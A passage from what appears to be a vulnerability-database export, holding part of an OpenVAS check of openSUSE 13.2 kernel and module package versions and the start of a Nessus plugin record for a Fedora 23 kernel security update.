res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~3.16.7~42.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~3.16.7~42.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa-xen\", rpm:\"kernel-obs-qa-xen~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop\", rpm:\"pcfclock-kmp-desktop~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop-debuginfo\", rpm:\"pcfclock-kmp-desktop-debuginfo~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20140629~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-\", rpm:\"vhba-kmp-default~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo-\", rpm:\"vhba-kmp-default-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-\", rpm:\"vhba-kmp-desktop~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-debuginfo-\", rpm:\"vhba-kmp-desktop-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-\", rpm:\"vhba-kmp-xen~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo-\", rpm:\"vhba-kmp-xen-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop\", rpm:\"virtualbox-guest-kmp-desktop~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop-debuginfo\", rpm:\"virtualbox-guest-kmp-desktop-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop\", rpm:\"virtualbox-host-kmp-desktop~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop-debuginfo\", rpm:\"virtualbox-host-kmp-desktop-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons\", rpm:\"xtables-addons~2.6~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debuginfo\", rpm:\"xtables-addons-debuginfo~2.6~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debugsource\", rpm:\"xtables-addons-debugsource~2.6~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default\", rpm:\"xtables-addons-kmp-default~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default-debuginfo\", rpm:\"xtables-addons-kmp-default-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop\", rpm:\"xtables-addons-kmp-desktop~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop-debuginfo\", rpm:\"xtables-addons-kmp-desktop-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen\", rpm:\"xtables-addons-kmp-xen~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen-debuginfo\", rpm:\"xtables-addons-kmp-xen-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.16.7~42.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-pae\", rpm:\"bbswitch-kmp-pae~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-pae-debuginfo\", rpm:\"bbswitch-kmp-pae-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae\", rpm:\"cloop-kmp-pae~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae-debuginfo\", rpm:\"cloop-kmp-pae-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae\", rpm:\"crash-kmp-pae~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae-debuginfo\", rpm:\"crash-kmp-pae-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-\", rpm:\"vhba-kmp-pae~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo-\", rpm:\"vhba-kmp-pae-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae\", rpm:\"virtualbox-guest-kmp-pae~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae-debuginfo\", rpm:\"virtualbox-guest-kmp-pae-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae\", rpm:\"virtualbox-host-kmp-pae~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae-debuginfo\", rpm:\"virtualbox-host-kmp-pae-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae\", rpm:\"xtables-addons-kmp-pae~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae-debuginfo\", rpm:\"xtables-addons-kmp-pae-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:22:26", "description": "A number of fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : kernel-4.3.3-301.fc23 (2016-26e19f042a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7513", "CVE-2015-7566"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-26E19F042A.NASL", "href": "https://www.tenable.com/plugins/nessus/89497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-26e19f042a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89497);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7513\", \"CVE-2015-7566\");\n script_xref(name:\"FEDORA\", value:\"2016-26e19f042a\");\n\n script_name(english:\"Fedora 23 : kernel-4.3.3-301.fc23 (2016-26e19f042a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1284847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1296466\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/175792.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb4335ff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 